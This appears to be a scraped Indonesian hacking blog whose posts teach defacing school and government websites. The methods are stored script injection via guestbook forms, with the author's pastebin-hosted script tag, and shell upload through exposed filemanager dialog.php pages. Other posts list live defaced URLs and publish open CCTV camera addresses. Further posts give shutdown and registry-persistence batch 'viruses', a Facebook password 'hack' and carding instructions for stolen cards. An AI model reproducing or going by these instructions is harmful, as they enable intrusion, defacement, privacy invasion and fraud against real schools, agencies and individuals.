Postingan

Cara deface poc jso

Gambar
Deface metode ini banyak di minati karena selain simple tapi juga targetnya web sekolah hehe..oh iya perlu di ketahui kalo deface metode ini sangat mudah di tikung orang gan...

Alat dan bahan:-script jso
                            -hp or pc
                           -kesabaran

Oke kalo ga punya script jso nya silahkan pakai punya saya atau buat sendiri..caranya?..klik link https://www.sadboy1922.zone.id/2019/04/cara-buat-script-jso.html

Script jso punya ane
<script> type="text/javascript"src="https://pastebin.com/raw/h4gG8ZBt"></script>

Oke pertama kita mulai dorking atau pencarian google
Dork:
inurl:/bukutamu.html site:sch.id

inurl:un.html site:sch id
Kembangin lagi dorknya gan biar dapet yg fresh

Exploit: admin/hubungi.php
(Buat manggil scriptnya)

1.Pertama kita dorking/cari situsnya dahulu pake dork di atas
2.kalo udah ketemu yg vuln tinggal isi daftarnya seperti ini Tinggal isi semuanya dan pastekan script jso nya ke pesan Lalu klik kirim gan …

Cara buat script jso

Gambar
Cara buat script Jso...fungsinya buat script buat deface poc jso..nah simka dan pahami ea...selain buat script deface poc jso...gunanya untuk mengenkripsi script deface kalian gan
1.siapkan script deface kalian...script html pastinya
2.pergi ke linkhttp://jdstiles.com/java/cct.html
3.copy semua script html kalian lalu pastekan ke kolom web design
Lalu pastekan ke web design
Habis paste lalu klik CharcodeAt() Maka muncul kode seperti ini Nah...sehabis itu kalian copy code charnya gan..tapi sebelum itu copy script di bawah ini..lalu pastekan kode charnya tadi
document.documentElement.innerHTML=String.fromCharCode(disini)
Contoh: document.documentElement.innerHTML=String.fromCharCode(60, 104, 116, 109, 108, 62, 10, 60, 104, 101, 97, 100, 62, 10, 60, 116, 105, 116, 108, 101, 62, 72, 97, 99, 107, 101, 100, 60, 47, 116, 105, 116, 108, 101, 62, 10, 10, 60, 98, 111, 100, 121, 62, 32, 60, 115, 99, 114, 105, 112, 116, 62, 32, 97, 108, 101, 114, 116, 40, 34, 83, 121) ...nah kalo sudah itu pergi…
Gambar
Cara deface metode reposible file uploaf adalah metode deface paling simple dan gampang...metode poc ini hanya modal dork>exploit>up shell

Pertama dorking dulu di google
*Dork:
inurl:/filemanager/ intext:"dialog.php"
inurl:/js/filemanager/ intext:"dialog.php"
inurl:/assets/filemanager/ intext:"dialog.php"
(Kembangin lagi dork nya ea)

*Exploit:dialog.php

1.Pertama seperti biasa kita dorking/search di google
2.pilih salah satu webnya..lalu exploitnya dialog php Pilih dialog.php ya 3.tinggal cari tempat up shell nya..kalo ketemu tampilanya seperti yg di bawah ini.. 4.kalo udah up shell/upload script deface mu..tinggal cari script yg kamu upload tadi lalu klik dan tahan lalu pilih show url Tarra terdeface Live target http://pphpbun.ditjenbun.pertanian.go.id/source/sadboy1922.html http://bkpsdmd.bangkatengahkab.go.id/bkdweb/assets/filemanager/filemanager/dialog.php/silentghost.html http://sikarep.pekalongankota.go.id/assets/js/filemanager/source/Upload/silent%20…

Hack akun facebook dengan black eye

Gambar
Caranya cukup simple namun tidak menjamin 100% berhasil...apa yg di perlukan:-id facebook target                  -koneksi stabil                  -kesabaran Oke ini caranya 1.kunjungi  BLACK EYE dahulu bisa di klik dibawah ini Klik tulisan Black eye *Black eye 2.klo udah tampilan webnya itu kayak gini.
masukan ID / nama akun facebook target lalu klik HACK NOW.

3.lalu tunggu prosen loadingnya Lalu jika sudah  ketemu halamanya nantikan ada 6 tombol pilih dan chek satu persatu

4. Klik salah satu tombol
5.lalu klik skip Ad/iklan dan akhirnya kamu mendapat password target...simple bukan...
Catatan:jika kalian mengalami salah password. Ulangi cara tadi dan kembali ke halaman PASSWORD SERVER dan pilih tombol yang lainnya..

Cara hack cctv

Gambar
Cara masuk cctv orang cukup mudah asalakan cctv tersebut terhubung kw internet sehingga kita bisa acces lewat browser..dan ga semua cctv bisa di masuki..hanya cctv yang tidak punya keamanan atau password..kalian bisa hack cctv menggunakan metasploit shodan io...atau cara lainya...tapi kali ini saya bakal ngasih ip cctv 100% work...jadi kalian ga perlu susah susah berusaha untul dapat alamat ip
Berikut alamat ipnya

*Alamat ip daerah jakarta
MONAS AREA 2 | http://114.110.17.6:8895SILANG MONAS TIMUR LAUT 1 | http://114.110.17.6:8904SILANG MONAS TIMUR LAUT 2 | http://114.110.17.6:8905MONAS BARAT LAUT 1 | http://114.110.17.6:8908SILANG MONAS BARAT LAUT 2 | http://114.110.17.6:8909MERDEKA MONAS 1 | http://114.110.17.6:8910SILANG MONAS TENGGARA 1 | http://114.110.17.6:8912MONAS TENGGARA 2 | http://114.110.17.6:8913PARKIR IRTI 1 | http://114.110.17.6:8914PARKIR IRTI 2 | http://114.110.17.6:8915MERDEKA SELATAN 1 | http://114.110.17.6:8916MERDEKA SELATAN 2 | http://114.110.17.6:8917TAMAN RIA | 

Cara Ddos & Dos

Gambar
DoS = Denial of Service. Serangan ini melibatkan satu komputer/ koneksi internet untuk (membanjiri) sebuah server dengan paket ICMP/TCP/UDP,tujuan dari serangan ini adalah untuk membuat bandwith server menjadi overload, sehingga server tidak bisa lagi menangani trafik yang masuk dan server akhirnya down.

DDoS = Distributed Denial of Service. DDoS Attack hampir sama dengan Dos tetapi perbedaan dari hasil yang disebabkan olehnya sangat berbeda. Serangan DDoS dijalankan menggunakan metode komputer yang terdistribusi yang sering disebut dengan 'botnet army', atau biasa juga dikenali dengan komputer "zombie". Proses nya dengan cara menginfeksi komputer lain dengan malware yang memberikan akses bagi botnet owner kepada komputer yang terinfeksi. Hal ini bisa berarti, bootnet owner bisa menggunakan resource apa saja dari komputer korban dan menggunakan koneksi komputer tersebut untukmembanjiri (flood) target yang akan diserang
Sebetulnya banyak software untuk men-generate s…

Cara buat Virus sederhana untuk komputer

Gambar
Virus adalah sebuah program yang i ciptakan untuk merusak atau membuat error pada system...
Cara membuat
alat dan bahanya cukup komputer/laptop dan juga text editor contonhnya notepad......Oke ini beberapa script buat virus
1.virus shutdown

Untuk melakukannya, silakan buka Notepad, dan copy paste kode di bawah. Lalu save file-nya dengan nama ForceShutdown.bat dan type file-nya All file.

@echo off msg * You very stupid shutdown -c "Error! Your computer has been Shutdown!" -s

Untuk mengaktifkan virus ini, kamu harus klik 2 kali pada file-nya. Maka, secara otomatis virus ini akan berjalan dan shutdown
2.auto shutdown
Efeknya komputer/laptopmu akan shutdown otomatis tiap kali di nyalakan
echo @echo off&gt;c:windowshartlell.bat echo break off&gt;&gt;c:windowshartlell.bat echo shutdown -r -t 11 -f&gt;&gt;c:windowshartlell.bat echo end&gt;&gt;c:windowshartlell.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz …

Tools ip lengkap

Gambar
Ini adalah tools lengkap mengenai ip....untuk selengkapnya silahkan pelajari sendiri gan ..fungsinya banyak.. Salah satu ip geolocation yg bisa melacak letak lokasi ip...klik link tools di bawah..
https://ipinfo.info/html/ip_checker.php

Catatan:jika aplikasi sadboy menspam iklan silahkan hapus cache atau data pada aplikasi ini...


Tools hacker terbaik

Gambar
Silahkan klik link/copas dan pastekan ke google untuk mendownload aplikasinya:v....btw jangan pernah ngaku hacker karen hacker itu tidak pernah ngaku...dan jangan pernah menjual aplikas ini...
1.Tools by anondsfs
*APLIKASI (DRIVE GOOGLE LINK)*

*Anon Web Scanner*

Download via Drive Google :

https://drive.google.com/file/d/1EsLwdPyQFxRK7WZt5bQ-IC0ye49uFQZZ/view?usp=drivesdk

Aplikasi untuk scan website, cari vuln, lihat kode sumber, versi CMS dan info website, brute force WP, exploitDB, Nmap, DNS LookUp, Enumerator, dll.
______________________________________

*Anon Gratis SMSid*

 Download via Google Drive :

https://drive.google.com/file/d/18-acFoEhWq3johW4hg2hTYmyKW1d7B3q/view?usp=drivesdk
Aplikasi SMS Gratis, Operator Indonesia yang didukung :

• Simpati (tested)
• AS (tested)
• Mentari
• IM3 (tested)
• XL/Axis (tested)
• Esia
• Flexi
• Smartfren (agak kurang stabil)
• 3 (tested)
______________________________________

*Webdav DSFS*

Download via Drive Google :

https://drive.google.com/file…

Cara nuyul cc buat tukang carding

Gambar
Karangan Syekh garox-kun Bin as-asw Al-zeeber mhank:v....carding adalah kegiatan hacking yang di mana peretas bisa memanipulasi suatu cc atau card credit:v..simak dan pakai otak anda untuk bisa belajar carding:v..karena carding tak semudah yg di katakan ferguso:v..btw ane cuma ngajarin cara nuyul cc card aja..kalo order di amazon mungkin next ane update:)
Cara nuyul cc card dengan altenen
1.hapus semua chace dan cookie pada browser kalean:v
2. pastikan pakai vpn(virtual private network)
3.pakai browser mozila firefox(cuma saran)
4.register dulu mhank di www.altenen.com/
5.kalau udah register langsung search
6.search sesuai kebutuhan..bisa visa,mastercard atau yg laen.
7.lalu pilih today atau postingan yg baru
8.kalo ketemu tinggal copas...dan tinggal pakai buat kebutuhan:v
Link:http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.altenen.com%2F&h=pAQFsRXPO&s=1

Aplikasi penghasil duit$$$:v

Gambar
Oke kali ini ane bakal bagi aplikasi penghasil duit atau bisa juga pulsa:v 1.Cashtree Yo i bagi para pencari receh mungkin sudah paham soal aplikasi ini..aplikasi ini bisa di gunakan untuk membeli pulsa/paket data bahkan juga voucher gratis dengan menukarkan poinya...bagi kalian yg ingin download klik link/salin link di bawah:v
https://invite.cashtree.id/c7d3e42 2.Pivot Adalah aplikasi yg di percaya dapat menghasilkan btc dengan cara menukarkan pivot point...oke klik atau salin link
3.Dent Adalah aplikasi penghasil pulsa/paket data..klik/salin link di bawah:v...ini aplikasi paling populer gann..recomended banget:v
https://dent.app.link/gkOkhDJ5xS 4.caping Caping adalah aplikasi baca berita yang bermanfaat..karena dengan aplikasi ini kalian bisa mendapat koin dari berita yg kalian baca...koin itu bisa di tukar dengan hadiah seperti voucher/pulsa Klik link untuk download  https://capingnews.onelink.me/931926944/9aeea01

Binary converter

Gambar
Binary converter adalah alat untuk tools untuk mengconvert angka Binary converter tools binary..untuk menggunakanya hanya masukan kode binarynya lalu convert
Klik link di bawah
-Binary code

Sql map

Gambar
Oke kali ini ane share soal sql map...tenttu saja cuma para defacer saja yg paham soal sql injection..oke caranya cukup masukan alamat target..dan selanjutnya inject:v
Kalian bisa lakukan di browser..silahkan klik link atau salin link dan pastekan ke browser:v
-Link sql
https://suip.biz/?act=sqlmap

Download vidio youtube:v

Gambar
Hehehe kali ini saya akan bagi link untuk downlad vidio di youtube..alasanya karena kalo yutubankan:v ga bisa di download pidionya:v..mending donlot pidio yutub aja:v...oke jika anda ga paham tidak papa...klik link atau bisa juga salin link lalu tempel di browser anda. Terimakasih:)
-klik/salin link di bawah ini:v
https://id.savefrom.net/


Sms gratis se indonesia

Gambar
Yo i ini tools khusu buat kalean para jones ea..tools sms gratis di indonesia 100% work dan berfungsi:v..oke cara pakainy cukup masukan nomor yg maudi sms dan masukan pesan kamu...klik link di bawah:) Klik linknya:v -Sms gratis buat jones:v
Gambar
Cyber maps adalah map dimana kita bisa melihat para hacker:v sedang perang cyber...para hacker biasanya melakukan serangan seperti ddos,virus,trojan,ransomware dan masih banyak lagi..untuk melihat cybermaps kalian hanya perlu koneksi yang lancar dan browser yang mendukung seperti chrome misalnya
Oke caranya cukup klik link cyber mapsnya di bawah ini pilih salah satu:
•Cyber maps by treathcloud

    -Treathcloud cybermap •Norse cyber attack     -Norse cyber maps Catatan:Khusus untuk norse cyber maps kalian perlu koneksi yang sangat stabil dan juga pakai browser yg bisa menyimpan cache seperti chrome

Cara buat script deface pemula

Gambar
.Pemrograman adalah proses menulis, menguji dan memperbaiki, dan memelihara kode yang membangun suatu program komputer. Kode ini ditulis dalam berbagai bahasa pemrograman...ada banyak sekali bahasa pemrograman.. Namun saya hanya akan membahas yg paling easy saja:)
1.salah satunya html...kali ini saya hanya bahas dasarnya saja..bagi para defacer mungkin sudah familiar dengan html...yaitu bahasa yang di gunakan untuk membuat sebuah website..kalian hanya perlu menggunaka aplikasi text editor seperti dcoder bagi yg menggunaka android dan note pad bagi yang menggunakan pc/laptop

 Oke kita mulai dari dasarnya.html itu terdiri dari tag tag..jadi kita pakai tag paling dasar..berikut:
<HTML>
<head>
<title>Ini judul html mu</title>
Lalu kita bisa juga tambahkan warna background dan font serta warnanya
</title>
</head>
<body BGCOLOR="black">
<center><FONT COLOR="aqua><FONT SIZE=4>ini adalah teks kamun </FONT></FONT>…

Cara deface untuk pemula

Gambar
saya akan menjelaskan apa itu deface dan juga cara mendeface website..deface adalah suatu serangan peretasan terhadap sebuah website yang dilakukan oleh defacer dengan cara masuk ke system web tersebut lalu merubah tampilanya..tetapi beberapa teknik deface hanya sekedar menitipkan html/script ke server Biasanya para defacer melakukan serangan untuk memberi pesan atau hanya sekedar test script..tapi sebelum anda malakukan deface anda harus paham tentang html dan juga istilah istilah dalam deface...berikut istilah dalam deface. Biasanya para defacer melakukan serangan untuk memberi pesan atau hanya sekedar test script..tapi sebelum anda malakukan deface anda harus paham tentang html dan juga istilah istilah dalam deface...berikut istilah dalam deface.
1.Dork:dork adalah  pencarian web yang di lakukan dengan memasukan pencarian khusus contohnya inurl:file manager upload... 2.exploit:yaitu teknik untuk mencari kelemahan website dengan mengetikan beberapa perintah agar bisa di temukan tempat u…